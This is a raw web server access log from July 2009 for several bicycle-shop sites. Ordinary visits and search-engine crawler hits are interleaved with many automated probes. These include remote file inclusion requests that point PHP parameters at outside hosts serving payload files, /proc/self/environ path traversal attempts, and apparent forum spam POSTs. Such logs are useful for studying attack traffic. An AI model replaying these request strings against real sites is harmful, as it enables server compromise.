91.121.150.170 - - [11/Jul/2009:07:43:07 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
209.91.139.213 - - [11/Jul/2009:07:48:35 -0700] "GET /standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
193.238.230.166 - - [11/Jul/2009:07:53:58 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible)" "www.houstonbikeshop.com"
193.238.230.166 - - [11/Jul/2009:07:53:58 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible)" "www.houstonbikeshop.com"
193.238.230.166 - - [11/Jul/2009:07:53:58 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible)" "www.houstonbikeshop.com"
193.238.230.166 - - [11/Jul/2009:07:53:59 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible)" "www.houstonbikeshop.com"
193.238.230.166 - - [11/Jul/2009:07:53:59 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible)" "www.houstonbikeshop.com"
209.91.139.213 - - [11/Jul/2009:08:03:17 -0700] "GET /logs/access.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.91.139.213 - - [11/Jul/2009:08:03:17 -0700] "GET /standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.91.139.213 - - [11/Jul/2009:08:03:17 -0700] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
65.55.211.73 - - [11/Jul/2009:08:16:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.73 - - [11/Jul/2009:08:16:39 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
59.22.140.17 - - [11/Jul/2009:08:21:00 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.231.42.152 - - [11/Jul/2009:08:43:58 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://CHILEQUELMONA.altervista.org/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:45:42 -0700] "GET /skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:45:42 -0700] "GET /logs/access.log%20%20//skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:45:42 -0700] "GET /logs//skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:45:47 -0700] "GET /skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:45:47 -0700] "GET /logs//skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:45:47 -0700] "GET /logs/access.log%20%20//skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:48:50 -0700] "GET /logs/access.log//skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.207.17.120 - - [11/Jul/2009:08:49:23 -0700] "GET /logs/access.log//skin_shop/standard/4_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:56:29 -0700] "GET /skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:56:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:56:31 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:56:41 -0700] "GET /skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:56:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:56:41 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.75 - - [11/Jul/2009:08:58:04 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
123.242.165.138 - - [11/Jul/2009:08:59:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:59:07 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:59:09 -0700] "GET /skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:59:09 -0700] "GET /skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:59:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jul/2009:08:59:13 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:09:17:08 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:09:24:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
81.19.67.243 - - [11/Jul/2009:09:28:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:09:30:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
210.205.57.2 - - [11/Jul/2009:09:52:40 -0700] "GET /translations/German.txt///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [11/Jul/2009:09:53:02 -0700] "GET /translations/German.txt///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
98.198.90.13 - - [11/Jul/2009:09:53:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)" "www.svbikes.com"
98.198.90.13 - - [11/Jul/2009:09:53:51 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.fisherbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)" "www.svbikes.com"
98.198.90.13 - - [11/Jul/2009:09:55:09 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)" "www.svbikes.com"
74.52.245.146 - - [11/Jul/2009:10:19:48 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.houstonbikeshop.com"
98.66.162.213 - - [11/Jul/2009:10:20:17 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.1" 200 533 "http://us.yhs.search.yahoo.com/avg/search?fr=yhs-avg&type=yahoo_avg_hs2-tb-web_us&p=blackdicks.com" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SIMBAR={4796ED96-DEA4-45AE-AFC7-F4E555FCDFFD}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "bicyclestoreshouston.com"
98.66.162.213 - - [11/Jul/2009:10:20:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SIMBAR={4796ED96-DEA4-45AE-AFC7-F4E555FCDFFD}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "bicyclestoreshouston.com"
190.144.44.36 - - [11/Jul/2009:10:26:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jul/2009:10:26:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jul/2009:10:26:44 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jul/2009:10:27:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jul/2009:10:27:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jul/2009:10:27:16 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.39 - - [11/Jul/2009:10:29:34 -0700] "GET /bullitinboard/viewtopic.php?p=14840 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs/access.log/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [11/Jul/2009:10:33:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
124.0.139.129 - - [11/Jul/2009:10:38:31 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [11/Jul/2009:10:38:31 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:10:38:54 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:10:38:54 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:10:38:55 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:10:38:57 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:10:38:57 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
114.80.93.71 - - [11/Jul/2009:10:45:38 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
124.0.139.129 - - [11/Jul/2009:10:54:05 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [11/Jul/2009:10:56:14 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:10:59:33 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:10:59:34 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
70.87.64.234 - - [11/Jul/2009:11:07:23 -0700] "GET /skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:11:07:23 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:11:07:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:11:07:28 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:11:07:28 -0700] "GET /skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:11:07:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:11:07:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:11:07:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
77.88.43.25 - - [11/Jul/2009:11:09:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:11:13:50 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:11:16:56 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:11:28:05 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:11:37:08 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:11:44:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
67.205.85.53 - - [11/Jul/2009:11:50:11 -0700] "GET / HTTP/1.0" 200 1748 "HOUSTONBIKESHOP.COM/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:12:17:34 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
81.19.66.38 - - [11/Jul/2009:12:18:38 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:12:18:39 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:12:18:40 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:12:18:40 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:12:18:41 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:12:25:19 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
81.19.66.38 - - [11/Jul/2009:12:29:33 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:12:29:34 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:12:30:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
70.196.254.98 - - [11/Jul/2009:12:48:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
70.196.254.98 - - [11/Jul/2009:12:48:31 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
65.55.211.73 - - [11/Jul/2009:13:05:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.73 - - [11/Jul/2009:13:05:45 -0700] "GET /logs/?D=D HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
70.45.160.104 - - [11/Jul/2009:13:23:32 -0700] "GET /bullitinboard/viewtopic.php?p=15843 HTTP/1.1" 200 533 "http://us.yhs.search.yahoo.com/avg/search?p=nemesio+canales+biografia&type=yahoo_avg_hs2-tb-web_chrome_us&fr=yhs-avg-chrome&YST_b=21" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "bicyclestoreshouston.com"
70.45.160.104 - - [11/Jul/2009:13:23:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "bicyclestoreshouston.com"
70.45.160.104 - - [11/Jul/2009:13:23:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "bicyclestoreshouston.com"
70.45.160.104 - - [11/Jul/2009:13:23:35 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "bicyclestoreshouston.com"
208.80.195.34 - - [11/Jul/2009:13:48:18 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {119ACEB4-10E1-C2DB-174E-A80CA34E615F}; SIMBAR Enabled; Alexa Toolbar)" "bicyclestoreshouston.com"
